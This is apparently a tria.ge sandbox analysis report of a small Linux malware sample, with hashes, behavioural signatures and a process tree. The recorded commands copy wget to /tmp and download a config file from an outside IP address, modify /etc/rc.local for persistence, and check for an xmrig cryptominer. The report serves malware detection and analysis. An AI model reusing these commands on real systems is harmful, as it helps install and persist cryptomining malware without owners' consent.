Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
133s -
max time network
150s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240226-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
09/04/2024, 17:01
Static task
static1
Behavioral task
behavioral1
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
-
Size
2KB
-
MD5
ea79e6f3a96671aa051f677679c2bda0
-
SHA1
2e2f085e81e8e750da43d8217541404ab78461e9
-
SHA256
f60d0a378a482bde674b1e5d610bd8d3926468f59ced75e4d29776d14fa4c543
-
SHA512
ce1a0f0c3c233a3bfa2724961e9f0f4ae2b061a60560ec37f0acfabad931c6a5a13ae2477d363e855f586fb5e097d5a33c464e57fb8ab06641ac67afcff58fce
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/wget 732 wget -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies rc script 1 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118 -
Reads CPU attributes 1 TTPs 1 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/tty/drivers ps File opened for reading /proc/110/cmdline ps File opened for reading /proc/18/stat ps File opened for reading /proc/678/stat ps File opened for reading /proc/679/cmdline ps File opened for reading /proc/1/status ps File opened for reading /proc/380/status ps File opened for reading /proc/670/stat ps File opened for reading /proc/670/status ps File opened for reading /proc/250/status ps File opened for reading /proc/250/cmdline ps File opened for reading /proc/15/status ps File opened for reading /proc/123/stat ps File opened for reading /proc/334/status ps File opened for reading /proc/338/stat ps File opened for reading /proc/707/status ps File opened for reading /proc/721/cmdline ps File opened for reading /proc/722/cmdline ps File opened for reading /proc/4/stat ps File opened for reading /proc/14/cmdline ps File opened for reading /proc/175/cmdline ps File opened for reading /proc/720/status ps File opened for reading /proc/13/status ps File opened for reading /proc/18/status ps File opened for reading /proc/19/status ps File opened for reading /proc/36/status ps File opened for reading /proc/74/cmdline ps File opened for reading /proc/706/cmdline ps File opened for reading /proc/9/stat ps File opened for reading /proc/14/status ps File opened for reading /proc/15/cmdline ps File opened for reading /proc/123/status ps File opened for reading /proc/234/stat ps File opened for reading /proc/8/status ps File opened for reading /proc/123/cmdline ps File opened for reading /proc/679/stat ps File opened for reading /proc/7/cmdline ps File opened for reading /proc/7/status ps File opened for reading /proc/12/stat ps File opened for reading /proc/19/stat ps File opened for reading /proc/74/stat ps File opened for reading /proc/78/status ps File opened for reading /proc/381/cmdline ps File opened for reading /proc/701/cmdline ps File opened for reading /proc/2/status ps File opened for reading /proc/72/cmdline ps File opened for reading /proc/419/stat ps File opened for reading /proc/uptime ps File opened for reading /proc/12/cmdline ps File opened for reading /proc/18/cmdline ps File opened for reading /proc/76/cmdline ps File opened for reading /proc/700/cmdline ps File opened for reading /proc/8/stat ps File opened for reading /proc/10/stat ps File opened for reading /proc/16/status ps File opened for reading /proc/75/stat ps File opened for reading /proc/110/status ps File opened for reading /proc/386/stat ps File opened for reading /proc/5/cmdline ps File opened for reading /proc/339/cmdline ps File opened for reading /proc/380/cmdline ps File opened for reading /proc/21/cmdline ps File opened for reading /proc/16/cmdline ps File opened for reading /proc/21/status ps -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wget cp
Processes
-
/tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118/tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes1181⤵
- Modifies rc script
PID:708 -
/bin/cpcp /usr/bin/wget .2⤵
- Writes file to tmp directory
PID:728
-
-
/bin/chmodchmod +x wget2⤵PID:731
-
-
/tmp/wget./wget -P /tmp/ http://103.45.185.68:6358/config.json2⤵
- Executes dropped EXE
PID:732
-
-
/bin/catcat /etc/rc.local1⤵PID:714
-
/bin/grepgrep /etc/mlwk.sh1⤵PID:715
-
/bin/grepgrep -v grep1⤵PID:716
-
/bin/grepgrep /tmp/xmrig1⤵PID:721
-
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
PID:720
-
/bin/grepgrep -v grep1⤵PID:722
-
/usr/bin/wcwc -l1⤵PID:723
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
18B
MD52e5bcdd3b23224ecae22093a9349b20a
SHA1b4a63c6da233638e105eb63db7c2bf6dcf9b11c3
SHA2564157be04ebab2c4aa0df84f890df6062723225e8dc19cabc475f4febc5c8a77d
SHA512c40cd9dad61486ab872ed7d05bbdfd7ac55d22c8b12e113aa84b9ee664d5744c40807d9b7bd7390e4c570874418bdcc14695017fbffb5dabeaf58dd60ce66af7
-
Filesize
536KB
MD57bb64131b781b7fe42df16e951677c42
SHA1b975e340d8aa1fade395322a2ce1d84ec8e8fdc3
SHA256fc6db07a0e096020bb4023351df4819d74992e0148c939582ef3f83e73e56b58
SHA512544f0b7ff535ff129be1b51e545a4e991b928d7388f9024f9c33582951980f62171f06cb7f89f03ab080d0f60a3530365ca9b98ff1ad56b984ccf58cfb59aee0